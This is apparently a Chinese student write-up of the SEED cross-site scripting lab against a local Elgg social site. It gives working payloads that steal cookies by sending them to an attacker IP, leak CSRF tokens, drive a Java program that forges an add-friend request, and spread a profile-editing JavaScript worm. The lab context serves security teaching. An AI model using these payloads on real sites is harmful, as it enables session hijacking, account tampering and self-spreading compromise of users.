环境配置:
- 启动apache2服务:sudo service apache2 start
- 配置Apache服务,在/etc/apache2/sites-available/default中,配置如下:
实验内容:
Task 1:显示Alert窗口
在用户名boby下的修改信息这一网页中,在个人说明中插入alert信息:
<script>alert(‘XSS’);</script>
如下图所示:
登陆用户名bin,然后查看boby的信息,结果如下,会弹出一个窗口,结果如下:
将恶意内容放入js文件中,然后把链接指向js文件,具体指令如下:
attack.js文件的内容如下,将该文件放入xss.lagelgg.com的根目录下(/var/www/XSS/elgg/)
bin用户访问boby用户的信息时,攻击成功:
Task2:展示用户的cookie信息
在boby用户信息的编写框中输入如下攻击信息:
<script>alert(document.cookie);</script>
然后bin用户查看boby用户的信息时,出现如下弹框:
Task 3:
在boby用户信息的编写框中输入如下攻击信息(其中192.168.47.181为攻击中机器的ip地址):
<script>document.write('<img src =http://192.168.47.181:5555?c='+escape(document.cookie) + ' >');</script>
然后在攻击者机器中运行echoserv文件,让它监听5555端口,当bin用户查看boby的用户信息的时候,bin用户的cookie信息被发送到攻击者的机器上:
Task4:用偷来的Cookie来进行会话攻击
首先在boby的用户信息编写框中输入如下信息:
<script>document.write('<img src=http://127.0.0.1:5555?c='+escape(document.cookie)+'&'+elgg.security.token.__elgg_ts+'&'+elgg.security.token.__elgg_token+' >');</script>
该js脚本的作用就是将访问boby用户信息的用户的cookie和__elgg_ts,__elgg_token信息发送到攻击者机器。
用LiveHttpHeaders工具来查看加好友的包的情况:
根据抓的包的信息来完成程序的构造:
import java.net.*;
import java.io.*;
public class HTTPSimpleForge {
public static void main(String[] args) throws IOException {
try {
int responseCode;
InputStream responseIn=null;
// URL to be forged.
URL url = new URL ("http://www.xsslabelgg.com/action/friends/add?friend=41&__elgg_ts=1464013312&__elgg_token=c2aa7157f41d7d265d4f082aa0b03b4f");
URLConnection urlConn = url.openConnection();
if (urlConn instanceof HttpURLConnection) {
urlConn.setConnectTimeout(60000);
urlConn.setReadTimeout(90000);
}
urlConn.addRequestProperty("Host","www.xsslabelgg.com");
urlConn.addRequestProperty("User-Agent","Sun JDK 1.6");
urlConn.setRequestProperty("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
urlConn.setRequestProperty("Accept-Language","en-us,en;q=0.5");
urlConn.setRequestProperty("Accept-Encoding","gzip,deflate");
urlConn.setRequestProperty("Referer","http://www.xsslabelgg.com/profile/charlie");
urlConn.setRequestProperty("Cookie","Elgg=rpmo7shdmq6b6kdg38o76oo3j5");
urlConn.setRequestProperty("Connection","keep-alive");
urlConn.setDoOutput(true);
String data="username=charlie&seed=charlie@seed.com";
OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream());
wr.write(data);
wr.flush();
// HttpURLConnection a subclass of URLConnection is returned by
// url.openConnection() since the url is an http request.
if (urlConn instanceof HttpURLConnection) {
HttpURLConnection httpConn = (HttpURLConnection) urlConn;
// Contacts the web server and gets the status code from
// HTTP Response message.
responseCode = httpConn.getResponseCode();
System.out.println("Response Code = " + responseCode);
// HTTP status code HTTP_OK means the response was
// received sucessfully.
if (responseCode == HttpURLConnection.HTTP_OK) {
// Get the input stream from url connection object.
responseIn = urlConn.getInputStream();
// Create an instance for BufferedReader
// to read the response line by line.
BufferedReader buf_inp = new BufferedReader(
new InputStreamReader(responseIn));
String inputLine;
while((inputLine = buf_inp.readLine())!=null) {
System.out.println(inputLine);
}
}
}
} catch (MalformedURLException e) {
e.printStackTrace();
}
}
}
更改攻击者机器的/etc/hosts文件,使其修改/etc/hosts文件:
将www.xsslabelgg.com的ip地址改为192.168.47.185(受害者机器的ip)
在受害者机器上登入samy用户,首先查看samy的好友情况,可知现在samy没有好友:
Samy查看boby的信息,其cookie信息,cookie和__elgg_ts,__elgg_token信息都发回了攻击者机器:
将编写的攻击程序的cookie,__elgg_ts,__elgg_token等信息填充好,编译程序Javac HTTPSimpleForge.java,然后运行java HTTPSimpleForge,收到html的返回信息:
可知结果为200,查看samy的好友信息如下:
可知攻击成功。
Task 5:写一个XSS蠕虫
首先登陆boby用户,修改用户信息,查看包的情况如下:
根据包的情况编写worm.js程序:
var nod = document.getElementsByClassName("elgg-border-plain elgg-transition");
var user = nod[0].attributes.getNamedItem("alt").nodeValue;
if(user != 'Boby')
{
var Ajax=null;
// Construct the header information for the HTTP request
Ajax=new XMLHttpRequest();
if(Ajax == null)
alert("Ajax is null");
Ajax.open("POST","http://www.xsslabelgg.com/action/profile/edit",true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("User-Agent","AJAX 1.2");
Ajax.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
Ajax.setRequestHeader("Accept-Language","en-US,en;q=0.5");
Ajax.setRequestHeader("Accept-Encoding","gzip,deflate");
var node = document.getElementsByClassName("elgg-border-plain elgg-transition");
var username = node[0].attributes.getNamedItem("alt").nodeValue;
Ajax.setRequestHeader("Refer","http://www.xsslabelgg.com/profile/"+username+"/edit");
Ajax.setRequestHeader("Keep-Alive","300");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie",document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
// Construct the content. The format of the content can be learned
// from LiveHTTPHeaders.
var content = "__elgg_token="+elgg.security.token.__elgg_token+"&__elgg_ts="+elgg.security.token.__elgg_ts+"&name="+username+"&description=I'm stupid&guid="+elgg.session.user.guid;
Ajax.setRequestHeader("Content-Length",content.length);
// Send the HTTP POST request.
Ajax.send(content);
}
现在在boby的profile中添加worm:
更改完毕:
现在以samy的身份登入,首先查看一下samy的信息,发现什么都没有描述:
然后其访问boby的个人信息:
再次查看自己的信息:
攻击成功。
扫一扫
1258
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
